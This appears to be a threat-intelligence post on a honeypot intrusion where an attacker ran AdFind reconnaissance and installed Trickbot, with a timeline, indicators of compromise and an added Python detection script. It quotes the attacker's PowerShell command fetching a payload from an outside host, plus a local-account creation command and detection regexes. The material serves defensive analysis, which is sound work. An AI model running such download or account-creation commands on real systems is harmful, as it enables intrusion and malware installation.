Trickbot and AdFind Recon

An attacker logged into the honeypot, dropped AdFind, a couple of batch files and Trickbot. The attacker created a user, ran a recon script utilizing AdFind and then installed Trickbot.

This is what the folder structure looked like.

Timeline

Time in UTC

22:13 – login from 216.170.123[.]19

22:15 – opens PowerShell and runs the following command to download enter.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest http://support-it.online/upl/data/enter.exe -OutFile c:\users\public\enter.exe

22:17 – ran test_32.exe

22:18 – ran adduser.bat

22:18 – ran enter.exe

22:19 – ran adf.bat

22:22 – socks.exe is run which drops Trickbot
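As an added example (not part of the original post), here is a small Python triage script that runs simple detections over constructed Sysmon-style process-creation events modelled on the timeline above and then checks whether the download -> user creation -> AdFind recon chain occurred in that order. The user name, AdFind arguments and batch-file contents are assumptions, since the post does not show them.

```python
import re

# Constructed process-creation events (time, image, command line) modelled on
# the honeypot timeline. The user name, AdFind arguments and what the batch
# files run are assumptions, not values observed on the honeypot.
SAMPLE_EVENTS = [
    ("22:15", "powershell.exe", "powershell.exe Invoke-WebRequest "
     "http://support-it.online/upl/data/enter.exe -OutFile c:\\users\\public\\enter.exe"),
    ("22:17", "test_32.exe", "c:\\users\\public\\test_32.exe"),
    ("22:18", "cmd.exe", "cmd.exe /c c:\\users\\public\\adduser.bat"),
    ("22:18", "net.exe", "net user backup P@ss /add"),          # assumed content of adduser.bat
    ("22:18", "enter.exe", "c:\\users\\public\\enter.exe"),
    ("22:19", "cmd.exe", "cmd.exe /c c:\\users\\public\\adf.bat"),
    ("22:19", "adfind.exe", "adfind.exe -f (objectcategory=person)"),  # assumed content of adf.bat
    ("22:22", "socks.exe", "c:\\users\\public\\socks.exe"),
    ("09:00", "powershell.exe", "powershell.exe Get-Date"),      # benign noise
]

# Detection rules: name -> case-insensitive regex over the command line.
RULES = {
    "powershell_download_to_public": r"invoke-webrequest.*-outfile\s+\S*\\users\\public\\",
    "local_user_added": r"^net(1)?(\.exe)?\s+user\s+\S+\s+\S+\s+/add",
    "adfind_recon": r"(^|\\)adfind(\.exe)?\s",
    "exec_from_public": r"^c:\\users\\public\\\S+\.exe$",
}

def match_rules(cmdline):
    """Return the names of all rules whose regex matches the command line."""
    return [name for name, pattern in RULES.items()
            if re.search(pattern, cmdline, re.IGNORECASE)]

def triage(events):
    """Return (hits, chained): hits is a list of (time, rule) in event order;
    chained is True when a PowerShell download to Users\\Public was followed
    (not necessarily directly) by a local user add and then AdFind execution."""
    hits = [(time, name) for time, _image, cmdline in events
            for name in match_rules(cmdline)]
    order = iter(name for _, name in hits)
    chain = ["powershell_download_to_public", "local_user_added", "adfind_recon"]
    chained = all(step in order for step in chain)  # ordered subsequence check
    return hits, chained

if __name__ == "__main__":
    hits, chained = triage(SAMPLE_EVENTS)
    for time, rule in hits:
        print(time, rule)
    print("recon chain observed:", chained)
```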

Trickbot

This is a sandbox run of enter.exe, which eventually leads to Trickbot.

Trickbot checking to see if the IP is blacklisted.

IOCs

All executables and scripts can be found in MISP

MISP Priv 65043

MISP circl osint feed UUID 5e4b486e-9968-4af1-87dc-4ff4950d210f

C2 195.133.145.31 443/tcp

All script commands – pastebin

Any.Run Sandbox Run
